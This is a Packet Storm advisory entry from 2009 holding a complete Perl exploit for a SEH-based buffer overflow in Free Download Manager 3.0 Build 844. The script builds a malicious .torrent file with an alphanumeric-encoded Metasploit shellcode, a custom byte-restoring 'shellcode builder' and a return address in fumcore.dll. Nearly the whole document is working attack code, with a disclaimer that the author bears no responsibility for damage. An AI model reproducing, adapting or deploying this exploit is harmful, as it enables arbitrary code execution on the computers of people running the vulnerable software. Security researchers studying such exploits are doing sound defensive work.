Free Download Manager 3.0 Buffer Overflow

2009-02-03T00:00:00
ID PACKETSTORM:74594
Type packetstorm
Reporter SkD
Modified 2009-02-03T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit  
# -----------------------------------------------------------  
# Exploit by SkD (skdrat@hotmail.com)  
#  
# Vendors URL =  
# [www.freedownloadmanager.org]  
# Download FDM 3.0 Build 844 =  
# [http://www.download.com/Free-Download-Manager/3000-2071_4-10301621.html]  
# (Downloaded by over 1.6 million users!)  
#  
# This is another one of the more advanced exploitation methods  
# for buffer overflows using my method called "shell building".  
# It utilizes a SEH overflow and then a shellcode builder/assembler  
# "builds"/or "assembles" bytes that were deleted by transformation  
# of the buffer so that the shellcode will work without a flaw.  
# I have been able to do this because of my recent experiences with  
# UNICODE based overflows (heap & stack). This is a demonstration  
# of how you can obtain power with limitations to buffer.  
# Of course I could have used my shellhunting technique,  
# but this is a new method, and to demonstrate it in a world of  
# dying buffer overflows is important for me.  
#  
# Unfortunately I did not have time to make this a universal exploit  
# so it will only work on all NT systems EXCEPT Vista (due to randomized  
# heap, etc). But with a few modifications it can work (sure of it).  
# Read my notes & comments in the script for more info.  
#  
# Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4.  
#  
# Note: Author has no responsibility over the damage you do with this!  
  
use strict;  
use warnings;  
  
my $tdata1 = "\x64\x38\x3A\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x31\x32\x3A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x37\x3A\x63\x6F\x6D".  
"\x6D\x65\x6E\x74\x31\x32\x3A\x63\x6F\x6D\x6D\x65\x6E\x74\x74\x74\x74\x74\x74\x31\x33\x3A\x63\x72\x65\x61\x74\x69\x6F\x6E\x20".  
"\x64\x61\x74\x65\x69\x31\x32\x33\x33\x36\x31\x36\x35\x30\x37\x65\x34\x3A\x69\x6E\x66\x6F\x64\x36\x3A\x6C\x65\x6E\x67\x74\x68".  
"\x69\x39\x31\x37\x33\x34\x65\x34\x3A\x6E\x61\x6D\x65\x31\x32\x39\x39\x39\x3A";  
my $tdata2 = "\x31\x32\x3A\x70\x69\x65\x63\x65\x20\x6C\x65\x6E\x67\x74\x68\x69\x32\x36\x32\x31\x34\x34\x65\x36\x3A\x70\x69\x65\x63\x65\x73".  
"\x32\x30\x3A\x10\x7F\xD5\x50\xE2\x70\xA5\x80\x61\x42\x7B\x53\x08\xE0\xCE\xFE\x9C\xDA\x2E\xE1\x65\x65";  
  
# win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com  
my $shellcode =  
"\x01\xeb\x03\x59\x01\xeb\x05\x01\xe8\x01\xf8\x01\xff\x01\xff\x01\xff\x4f\x49\x49\x49\x49\x49".  
#Notice I added 0x01 byte before each 0x80=> byte.  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".  
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".  
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x47".  
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x51\x4b\x38".  
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48".  
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".  
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".  
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x57\x45\x4e\x4b\x48".  
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".  
"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58".  
"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x33".  
"\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x37".  
"\x4e\x50\x4b\x58\x42\x34\x4e\x30\x4b\x58\x42\x57\x4e\x31\x4d\x4a".  
"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".  
"\x42\x50\x42\x30\x42\x30\x4b\x58\x4a\x36\x4e\x53\x4f\x35\x41\x53".  
"\x48\x4f\x42\x36\x48\x35\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x37".  
"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x56\x4a\x59".  
"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56".  
"\x4e\x36\x43\x46\x42\x30\x5a";  
  
#This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does  
#the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes).  
#You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add  
#0x01 before each 0x80=> byte.  
my $shellcode_builder = ("\x59" x 3 ."\x40" x 9 . "\x51\x5b"."\x4b" x 4 ."\x01\x03"."\x48" x 10 ."\x43\x01\x03" x 3).  
("\x4b" x 3 ."\x03\x0b" x 35 ."\x41" x 14 ."\x41\x01\x01\x01\x01"."\x41\x01\x01" x 2).  
("\x49" x 3 ."\x48"."\x01\x01" x 5 ."\x40" x 3 ."\x01\x01\x41\x01\x01").  
("\x49" x 2 ."\x48" x 3 ."\x01\x01" x 13 ."\x40" x 3 ."\x01\x01\x41\x01\x01").  
("\x49" x 3 ."\x48" x 3 ."\x01\x01" x 11 ."\x49" x 3 ."\x01\x01" x 11).  
("\x40" x 3 ."\x41\x01\x01"."\x41" x 3 ."\x01\x01"."\x41" x 6 ."\x01\x01");  
my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder)); #Really important calculation to overflow the stack #and set everything in the right places(ret,addr,etc).  
my $shellcode_builder_label = "\x01\x01\x01\x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location.  
my $overflow1 = "\x41" x 10000;  
my $overflow2 = "\x41" x $len;  
my $sled = "\x41" x (350 - length($shellcode_builder));  
my $sehjmp = "\x71\x06\x01\x01"; #Since we cannot use 0xEB, I am going to use another type of jump ;)  
my $sehret = "\x1a\x09\x03\x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems)  
  
open(my $torrent, "> s.torrent");  
print $torrent $tdata1.  
$overflow1.$shellcode_builder_label.$sehjmp.$sehret.$shellcode_builder.$sled.$shellcode.$overflow2.  
$tdata2;  
close $torrent;  
  
  
`